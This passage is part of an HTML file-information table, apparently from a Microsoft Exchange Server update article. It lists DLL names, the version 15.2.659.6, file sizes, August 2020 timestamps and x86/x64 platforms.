applicable</td></tr><tr><td>Microsoft.exchange.inference.common.dll</td><td>15.2.659.6</td><td>216,968</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.hashtagsrelevance.dll</td><td>15.2.659.6</td><td>32,128</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.inference.peoplerelevance.dll</td><td>15.2.659.6</td><td>281,992</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.ranking.dll</td><td>15.2.659.6</td><td>18,824</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.safetylibrary.dll</td><td>15.2.659.6</td><td>83,848</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.service.eventlog.dll</td><td>15.2.659.6</td><td>15,232</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.infoworker.assistantsclientresources.dll</td><td>15.2.659.6</td><td>94,080</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.common.dll</td><td>15.2.659.6</td><td>1,840,000</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.eventlog.dll</td><td>15.2.659.6</td><td>71,552</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.infoworker.meetingvalidator.dll</td><td>15.2.659.6</td><td>175,488</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.instantmessaging.dll</td><td>15.2.659.6</td><td>45,944</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.irm.formprotector.dll</td><td>15.2.659.6</td><td>159,624</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.msoprotector.dll</td><td>15.2.659.6</td><td>51,072</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.ofcprotector.dll</td><td>15.2.659.6</td><td>45,952</td><td>12-Aug-2020</td><td>21:26</t
d><td>x64</td></tr><tr><td>Microsoft.exchange.isam.databasemanager.dll</td><td>15.2.659.6</td><td>32,128</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.isam.esebcli.dll</td><td>15.2.659.6</td><td>100,232</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.jobqueue.eventlog.dll</td><td>15.2.659.6</td><td>13,184</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.jobqueueservicelet.dll</td><td>15.2.659.6</td><td>271,240</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.killswitch.dll</td><td>15.2.659.6</td><td>22,400</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.killswitchconfiguration.dll</td><td>15.2.659.6</td><td>33,672</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.auditing.dll</td><td>15.2.659.6</td><td>18,312</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.certificatelog.dll</td><td>15.2.659.6</td><td>15,240</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll</td><td>15.2.659.6</td><td>27,528</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.easlog.dll</td><td>15.2.659.6</td><td>30,592</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.ecplog.dll</td><td>15.2.659.6</td><td>22,408</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.eventlog.dll</td><td>15.2.659.6</td><td>66,432</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.ewslog.dll</td><td>15.2.659.6</td><td>29,568</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll</td><td>15.2.659.6
</td><td>19,840</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.groupescalationlog.dll</td><td>15.2.659.6</td><td>20,352</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.httpproxylog.dll</td><td>15.2.659.6</td><td>19,328</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.hxservicelog.dll</td><td>15.2.659.6</td><td>34,176</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.iislog.dll</td><td>15.2.659.6</td><td>103,816</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.lameventlog.dll</td><td>15.2.659.6</td><td>31,608</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.migrationlog.dll</td><td>15.2.659.6</td><td>15,752</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll</td><td>15.2.659.6</td><td>20,864</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.oauthcafelog.dll</td><td>15.2.659.6</td><td>16,256</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.outlookservicelog.dll</td><td>15.2.659.6</td><td>49,024</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.owaclientlog.dll</td><td>15.2.659.6</td><td>44,416</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.owalog.dll</td><td>15.2.659.6</td><td>38,272</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.perflog.dll</td><td>15.2.659.6</td><td>10,375,040</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.pfassistantlog.dll</
td><td>15.2.659.6</td><td>29,064</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.rca.dll</td><td>15.2.659.6</td><td>21,376</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.restlog.dll</td><td>15.2.659.6</td><td>24,448</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.store.dll</td><td>15.2.659.6</td><td>15,232</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll</td><td>15.2.659.6</td><td>21,896</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.core.dll</td><td>15.2.659.6</td><td>89,472</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.auditing.dll</td><td>15.2.659.6</td><td>20,864</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.certificatelog.dll</td><td>15.2.659.6</td><td>26,504</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.cmdletinfralog.dll</td><td>15.2.659.6</td><td>21,376</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.common.dll</td><td>15.2.659.6</td><td>28,040</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.easlog.dll</td><td>15.2.659.6</td><td>28,552</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.errordetection.dll</td><td>15.2.659.6</td><td>36,224</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.ewslog.dll</td><td>15.2.659.6</td><td>16,768</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.griffinperfcounter.dll</td><td>15.2.659.
6</td><td>19,848</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.groupescalationlog.dll</td><td>15.2.659.6</td><td>15,232</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.httpproxylog.dll</td><td>15.2.659.6</td><td>17,280</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.hxservicelog.dll</td><td>15.2.659.6</td><td>19,840</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.iislog.dll</td><td>15.2.659.6</td><td>57,224</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.migrationlog.dll</td><td>15.2.659.6</td><td>17,792</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.oabdownloadlog.dll</td><td>15.2.659.6</td><td>18,816</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.oauthcafelog.dll</td><td>15.2.659.6</td><td>16,256</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.outlookservicelog.dll</td><td>15.2.659.6</td><td>17,800</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.owaclientlog.dll</td><td>15.2.659.6</td><td>15,240</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.owalog.dll</td><td>15.2.659.6</td><td>15,240</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.perflog.dll</td><td>15.2.659.6</td><td>52,616</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.pfassistantlog.dll</td><td>15.2.659.6</td><td>18,312</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.rca.dll<
/td><td>15.2.659.6</td><td>34,184</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.restlog.dll</td><td>15.2.659.6</td><td>17,280</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.store.dll</td><td>15.2.659.6</td><td>18,816</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll</td><td>15.2.659.6</td><td>43,392</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loguploader.dll</td><td>15.2.659.6</td><td>165,248</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.loguploaderproxy.dll</td><td>15.2.659.6</td><td>54,656</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.assistants.dll</td><td>15.2.659.6</td><td>9,056,128</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.attachmentthumbnail.dll</td><td>15.2.659.6</td><td>33,152</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.common.dll</td><td>15.2.659.6</td><td>124,288</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.crimsonevents.dll</td><td>15.2.659.6</td><td>82,824</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxassistants.eventlog.dll</td><td>15.2.659.6</td><td>14,216</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxassistants.rightsmanagement.dll</td><td>15.2.659.6</td><td>30,088</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxloadbalance.dll</td><td>15.2.659.6</td><td>661,376</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxloadbalance.serverstrings.dll</td><td>15.2.659.6</td><td>63,352</td><td>12-Aug-2020</td><td
>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll</td><td>15.2.659.6</td><td>175,488</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.common.dll</td><td>15.2.659.6</td><td>2,791,808</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.complianceprovider.dll</td><td>15.2.659.6</td><td>53,120</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.contactsyncprovider.dll</td><td>15.2.659.6</td><td>151,928</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.dll</td><td>15.2.659.6</td><td>966,528</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.easprovider.dll</td><td>15.2.659.6</td><td>185,216</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.eventlog.dll</td><td>15.2.659.6</td><td>31,616</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.googledocprovider.dll</td><td>15.2.659.6</td><td>39,800</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.imapprovider.dll</td><td>15.2.659.6</td><td>105,856</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.mapiprovider.dll</td><td>15.2.659.6</td><td>95,104</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.popprovider.dll</td><td>15.2.659.6</td><td>43,392</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.proxyclient.dll</td><td>15.2.659.6</td><td>18,816</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.pro
xyservice.dll</td><td>15.2.659.6</td><td>172,928</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.pstprovider.dll</td><td>15.2.659.6</td><td>102,784</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.remoteprovider.dll</td><td>15.2.659.6</td><td>98,680</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.storageprovider.dll</td><td>15.2.659.6</td><td>188,808</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.syncprovider.dll</td><td>15.2.659.6</td><td>43,400</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.xml.dll</td><td>15.2.659.6</td><td>447,360</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.xrmprovider.dll</td><td>15.2.659.6</td><td>89,992</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.monitoring.dll</td><td>15.2.659.6</td><td>107,904</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriveragents.dll</td><td>15.2.659.6</td><td>374,656</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedrivercommon.dll</td><td>15.2.659.6</td><td>193,920</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriverdelivery.dll</td><td>15.2.659.6</td><td>552,328</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll</td><td>15.2.659.6</td><td>16,256</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxtransport.submission.eventlog.dll</td><td>15.2.659.6</td><td>15,736</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr
><td>Microsoft.exchange.mailboxtransport.submission.storedriversubmission.dll</td><td>15.2.659.6</td><td>321,408</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll</td><td>15.2.659.6</td><td>17,800</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxtransport.syncdelivery.dll</td><td>15.2.659.6</td><td>45,440</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransportwatchdogservicelet.dll</td><td>15.2.659.6</td><td>18,304</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll</td><td>15.2.659.6</td><td>12,680</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.managedlexruntime.mppgruntime.dll</td><td>15.2.659.6</td><td>20,864</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.activedirectory.dll</td><td>15.2.659.6</td><td>415,104</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.classificationdefinitions.dll</td><td>15.2.659.6</td><td>1,269,632</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.compliancepolicy.dll</td><td>15.2.659.6</td><td>39,296</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.basics.dll</td><td>15.2.659.6</td><td>433,024</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.dll</td><td>15.2.659.6</td><td>4,563,336</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.owaoptionstrings.dll</td><td>15.2.659.6</td><td>260,992</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanelmsg.dll</td><td>15.2.659.6</td><td>33,672</td><td>12-Aug-2020</td><
td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.deployment.analysis.dll</td><td>15.2.659.6</td><td>94,080</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.deployment.dll</td><td>15.2.659.6</td><td>586,120</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.deployment.xml.dll</td><td>15.2.659.6</td><td>3,542,400</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.detailstemplates.dll</td><td>15.2.659.6</td><td>67,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.dll</td><td>15.2.659.6</td><td>16,487,304</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.edge.systemmanager.dll</td><td>15.2.659.6</td><td>58,752</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.infrastructure.asynchronoustask.dll</td><td>15.2.659.6</td><td>23,936</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.jitprovisioning.dll</td><td>15.2.659.6</td><td>101,760</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.migration.dll</td><td>15.2.659.6</td><td>543,624</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.mobility.dll</td><td>15.2.659.6</td><td>305,032</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.nativeresources.dll</td><td>15.2.659.6</td><td>273,792</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.powershell.support.dll</td><td>15.2.659.6</td><td>418,688</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.provisioning.dll</td><td>15.2.659.6</td><td>275,832</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.psdirectinvoke.dll
</td><td>15.2.659.6</td><td>70,520</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.rbacdefinition.dll</td><td>15.2.659.6</td><td>7,873,408</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.recipient.dll</td><td>15.2.659.6</td><td>1,502,088</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.snapin.esm.dll</td><td>15.2.659.6</td><td>71,552</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.systemmanager.dll</td><td>15.2.659.6</td><td>1,238,912</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.transport.dll</td><td>15.2.659.6</td><td>1,876,872</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementgui.dll</td><td>15.2.659.6</td><td>5,366,656</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementmsg.dll</td><td>15.2.659.6</td><td>36,224</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.mapihttpclient.dll</td><td>15.2.659.6</td><td>117,640</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mapihttphandler.dll</td><td>15.2.659.6</td><td>207,744</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagesecurity.dll</td><td>15.2.659.6</td><td>79,744</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagesecurity.messagesecuritymsg.dll</td><td>15.2.659.6</td><td>17,280</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.dlppolicyagent.dll</td><td>15.2.659.6</td><td>156,032</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.edgeagents.dll</td><td>15.2.659.6</td><td>65,912</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.
eventlog.dll</td><td>15.2.659.6</td><td>30,600</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.filtering.dll</td><td>15.2.659.6</td><td>58,240</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.hygienerules.dll</td><td>15.2.659.6</td><td>29,568</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.journalagent.dll</td><td>15.2.659.6</td><td>175,488</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.redirectionagent.dll</td><td>15.2.659.6</td><td>28,544</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.retentionpolicyagent.dll</td><td>15.2.659.6</td><td>75,136</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.rmsvcagent.dll</td><td>15.2.659.6</td><td>207,232</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.rules.dll</td><td>15.2.659.6</td><td>440,704</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.supervisoryreviewagent.dll</td><td>15.2.659.6</td><td>83,328</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.transportruleagent.dll</td><td>15.2.659.6</td><td>35,200</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.unifiedpolicycommon.dll</td><td>15.2.659.6</td><td>53,120</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.unjournalagent.dll</td><td>15.2.659.6</td><td>96,640</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.migration.dll</td><td>15.2.659.6</td><td>1,109,888</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.migrationworkflowservice.eventlog.dll</td><td>15.
2.659.6</td><td>14,728</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.mobiledriver.dll</td><td>15.2.659.6</td><td>135,552</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.monitoring.activemonitoring.local.components.dll</td><td>15.2.659.6</td><td>5,066,632</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.monitoring.servicecontextprovider.dll</td><td>15.2.659.6</td><td>19,840</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mrsmlbconfiguration.dll</td><td>15.2.659.6</td><td>68,480</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.net.dll</td><td>15.2.659.6</td><td>5,086,072</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.net.rightsmanagement.dll</td><td>15.2.659.6</td><td>265,600</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.networksettings.dll</td><td>15.2.659.6</td><td>37,768</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.notifications.broker.eventlog.dll</td><td>15.2.659.6</td><td>14,208</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.notifications.broker.exe</td><td>15.2.659.6</td><td>549,752</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabauthmodule.dll</td><td>15.2.659.6</td><td>22,912</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabrequesthandler.dll</td><td>15.2.659.6</td><td>106,368</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.oauth.core.dll</td><td>15.2.659.6</td><td>291,720</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.objectstoreclient.dll</td><td>15.2.659.6</td><td>17,288</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.odata.configuration.dll</td><td>15.2.659.6</td><td>277,896<
